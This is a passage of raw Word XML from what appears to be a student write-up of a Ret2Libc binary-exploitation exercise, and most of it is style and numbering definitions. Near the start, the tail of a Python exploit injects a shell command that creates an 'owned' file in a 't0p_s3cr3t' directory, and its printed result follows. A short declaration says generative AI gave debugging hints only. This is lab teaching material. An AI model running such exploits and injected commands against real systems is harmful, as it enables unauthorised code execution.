        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:ind w:hanging="0"/>
        <w:rPr>
          <w:color w:val="BA2121"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="BA2121"/>
        </w:rPr>
        <w:t># this variable is ="                      cd /home/user/t0p_s3cr3t &amp;&amp; touch owned &amp;&amp; echo 100 &gt; owned"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:ind w:hanging="0"/>
        <w:rPr>
          <w:color w:val="BA2121"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="BA2121"/>
        </w:rPr>
        <w:t># with four spaces so we can avoid unkown command on the system func</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:ind w:hanging="0"/>
        <w:rPr>
          <w:color w:val="BA2121"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="BA2121"/>
        </w:rPr>
        <w:t>sys.stdout.buffer.write(payload)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:ind w:hanging="0"/>
        <w:rPr>
          <w:color w:val="BA2121"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="BA2121"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:ind w:hanging="0"/>
        <w:rPr>
          <w:color w:val="BBBBBB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>cd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="BBBBBB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>t0p_s3cr3t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="BBBBBB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="BBBBBB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="BBBBBB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>owned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:ind w:hanging="0"/>
        <w:rPr>
          <w:color w:val="666666"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Use of Generative Artificial Intelligence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:widowControl/>
        <w:suppressAutoHyphens w:val="true"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="360" w:before="0" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The GenAI was used during the debu</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ging of Ret2Libc Practice logic by requesting the GenAI hints and tips for finishing the task. In any case the AI made the entire exercise alone (and the GenAI can’t do it anyways, as it activates the protection against hacking </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>guiding</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>)</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8" w:right="1418" w:gutter="567" w:header="709" w:top="1418" w:footer="709"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Consolas">
    <w:charset w:val="01" w:characterSet="utf-8"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Cambr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Normal"/>
      <w:rPr/>
    </w:pPr>
    <w:r>
      <w:rPr/>
    </w:r>
  </w:p>
  <w:p>
    <w:pPr>
      <w:pStyle w:val="Normal"/>
      <w:widowControl/>
      <w:suppressAutoHyphens w:val="true"/>
      <w:bidi w:val="0"/>
      <w:spacing w:lineRule="auto" w:line="360" w:before="0" w:after="120"/>
      <w:ind w:firstLine="720"/>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hanging="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lvlText w:val="%1.%2.%3.%4.%5"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1008"/>
        </w:tabs>
        <w:ind w:start="1008" w:hanging="1008"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Heading6"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1152"/>
        </w:tabs>
        <w:ind w:start="1152" w:hanging="1152"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Heading7"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1296"/>
        </w:tabs>
        <w:ind w:start="1296" w:hanging="1296"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Heading8"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:start="1440" w:hanging="1440"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Heading9"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1584"/>
        </w:tabs>
        <w:ind w:start="1584" w:hanging="1584"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2">
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="[%1]"/>
      <w:lvlJc w:val="start"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1134"/>
        </w:tabs>
        <w:ind w:start="1134" w:hanging="1134"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        <w:sz w:val="24"/>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hu-HU"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hu-HU" w:eastAsia="hu-HU"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Title" w:qFormat="1"/>
    <w:lsdException w:name="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c3c29"/>
    <w:pPr>
      <w:widowControl/>
      <w:suppressAutoHyphens w:val="true"/>
      <w:bidi w:val="0"/>
      <w:spacing w:lineRule="auto" w:line="360" w:before="0" w:after="120"/>
      <w:ind w:firstLine="720"/>
      <w:jc w:val="both"/>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Nadpis1Char"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00415288"/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:pageBreakBefore/>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="360" w:after="480"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Nadpis2Char"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:iCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>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unhideWhenUsed/>
    <w:qFormat/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="PageNumber">
    <w:name w:val="page number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="FootnoteCharactersuser" w:customStyle="1">
    <w:name w:val="Footnote Characters (user)"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00b50caa"/>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TextbublinyChar" w:customStyle="1">
    <w:name w:val="Text bubliny Char"/>
    <w:link w:val="BalloonText"/>
    <w:qFormat/>
    <w:rsid w:val="00350aec"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ZkladntextChar" w:customStyle="1">
    <w:name w:val="Základní text Char"/>
    <w:qFormat/>
    <w:rsid w:val="0090541f"/>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="tmutatkiemels" w:customStyle="1">
    <w:name w:val="Útmutató kiemelés"/>
    <w:qFormat/>
    <w:rsid w:val="006f512e"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="tmutatfontos" w:customStyle="1">
    <w:name w:val="Útmutató fontos"/>
    <w:qFormat/>
    <w:rsid w:val="006f512e"/>
    <w:rPr>
      <w:b/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Irodalomjegyzkforrs" w:customStyle="1">
    <w:name w:val="Irodalomjegyzék forrás"/>
    <w:qFormat/>
    <w:rsid w:val="006f512e"/>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="BookTitle">
    <w:name w:val="Book Title"/>
    <w:uiPriority w:val="33"/>
    <w:qFormat/>
    <w:rsid w:val="003f5425"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="VrazncittChar" w:customStyle="1">
    <w:name w:val="Výrazný citát Char"/>
    <w:link w:val="IntenseQuote"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="003f5425"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4F81BD"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="003f5425"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="C0504D"/>
      <w:spacing w:val="5"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="SubtleReference">
    <w:name w:val="Subtle Reference"/>
    <w:uiPriority w:val="31"/>
    <w:qFormat/>
    <w:rsid w:val="003f5425"/>
    <w:rPr>
      <w:smallCaps/>
      <w:color w:val="C0504D"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:qFormat/>
    <w:rsid w:val="003f5425"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="SubtleEmphasis">
    <w:name w:val="Subtle Emphasis"/>
    <w:uiPriority w:val="19"/>
    <w:qFormat/>
    <w:rsid w:val="003f5425"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="003f5425"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4F81BD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CittChar" w:customStyle="1">
    <w:name w:val="Citát Char"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:rsid w:val="003f5425"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:qFormat/>
    <w:rsid w:val="003f5425"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="StyleUnderline" w:customStyle="1">
    <w:name w:val="Style Underline"/>
    <w:qFormat/>
    <w:rsid w:val="00d07335"/>
    <w:rPr>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CommentReference">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rsid w:val="00630a92"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="TextkomenteChar" w:customStyle="1">
    <w:name w:val="Text komentáře Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CommentText"/>
    <w:qFormat/>
    <w:rsid w:val="00630a92"/>
    <w:rPr>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="PedmtkomenteChar" w:customStyle="1">
    <w:name w:val="Předmět komentáře Char"/>
    <w:basedOn w:val="TextkomenteChar"/>
    <w:link w:val="annotationsubject"/>
    <w:qFormat/>
    <w:rsid w:val="00630a92"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Nadpis1Char" w:customStyle="1">
    <w:name w:val="Nadpis 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00415288"/>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="32"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Nadpis2Char" w:customStyle="1">
    <w:name w:val="Nadpis 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:qFormat/>
    <w:rsid w:val="000c3c29"/>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:iCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="28"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>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ZkladntextChar"/>
    <w:pPr>
      <w:spacing w:before="360" w:after="120"/>
      <w:ind w:hanging="0"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="List">
    <w:name w:val="List"/>
    <w:basedOn w:val="BodyText"/>
    <w:pPr/>
    <w:rPr>
      <w:rFonts w:cs="Arial Unicode MS"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="007a4231"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="240"/>
      <w:ind w:hanging="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index" w:customStyle="1">
    <w:name w:val="Index"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:suppressLineNumbers/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial Unicode MS"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HeaderandFooter" w:customStyle="1">
    <w:name w:val="Header and Footer"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr/>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00c00b3c"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="720"/>
        <w:tab w:val="center" w:pos="4320" w:leader="none"/>
        <w:tab w:val="right" w:pos="8640" w:leader="none"/>
      </w:tabs>
      <w:ind w:hanging="0"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Subtitle"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="00730b3c"/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:spacing w:lineRule="auto" w:line="240"/>
      <w:ind w:hanging="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:kern w:val="2"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Cmlapszerz" w:customStyle="1">
    <w:name w:val="Címlap szerző"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="00171054"/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="240"/>
      <w:ind w:hanging="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="009c1c93"/>
    <w:pPr>
      <w:keepLines/>
      <w:spacing w:before="120" w:after="4200"/>
      <w:ind w:hanging="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00c00b3c"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="720"/>
        <w:tab w:val="center" w:pos="4320" w:leader="none"/>
        <w:tab w:val="right" w:pos="8640" w:leader="none"/>
      </w:tabs>
      <w:ind w:hanging="0"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="009c1c93"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0"/>
      <w:ind w:hanging="0" w:start="238"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Nyilatkozatcm" w:customStyle="1">
    <w:name w:val="Nyilatkozat cím"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:pageBreakBefore/>
      <w:spacing w:before="0" w:after="640"/>
      <w:ind w:hanging="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:caps/>
      <w:sz w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Nyilatkozatkeltezs" w:customStyle="1">
    <w:name w:val="Nyilatkozat keltezés"/>
    <w:basedOn w:val="Nyilatkozatszveg"/>
    <w:qFormat/>
    <w:rsid w:val="00854bdc"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="960"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00d1632f"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="720"/>
        <w:tab w:val="right" w:pos="8494" w:leader="dot"/>
      </w:tabs>
      <w:spacing w:before="0" w:after="0"/>
      <w:ind w:hanging="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="009c1c93"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0"/>
      <w:ind w:hanging="0" w:start="482"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:rsid w:val="009c1c93"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0"/>
      <w:ind w:hanging="0" w:start="720"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC5">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:rsid w:val="009c1c93"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0"/>
      <w:ind w:hanging="0" w:start="958"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC6">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:rsid w:val="009c1c93"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0"/>
      <w:ind w:start="1202"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC7">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:pPr>
      <w:ind w:start="1440"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:pPr>
      <w:ind w:start="1680"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:pPr>
      <w:ind w:start="1920"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Irodalomjegyzksor" w:customStyle="1">
    <w:name w:val="Irodalomjegyzék sor"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="00b96880"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="720"/>
        <w:tab w:val="left" w:pos="567" w:leader="none"/>
      </w:tabs>
      <w:spacing w:lineRule="auto" w:line="240" w:before="120" w:after="240"/>
      <w:ind w:hanging="567" w:start="567"/>
      <w:jc w:val="start"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="FootnoteText">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="Normal"/>
    <w:semiHidden/>
    <w:rsid w:val="00b50caa"/>
    <w:pPr/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Fejezetcimszmozsnlkl" w:customStyle="1">
    <w:name w:val="Fejezetcim számozás nélkül"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00d1632f"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:spacing w:before="240" w:after="480"/>
      <w:ind w:firstLine="720"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Source" w:customStyle="1">
    <w:name w:val="Source"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:pBdr>
        <w:top w:val="single" w:sz="8" w:space="1" w:color="000000"/>
        <w:left w:val="single" w:sz="8" w:space="4" w:color="000000"/>
        <w:bottom w:val="single" w:sz="8" w:space="1" w:color="000000"/>
        <w:right w:val="single" w:sz="8" w:space="4" w:color="000000"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
      <w:spacing w:lineRule="auto" w:line="240"/>
      <w:ind w:hanging="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
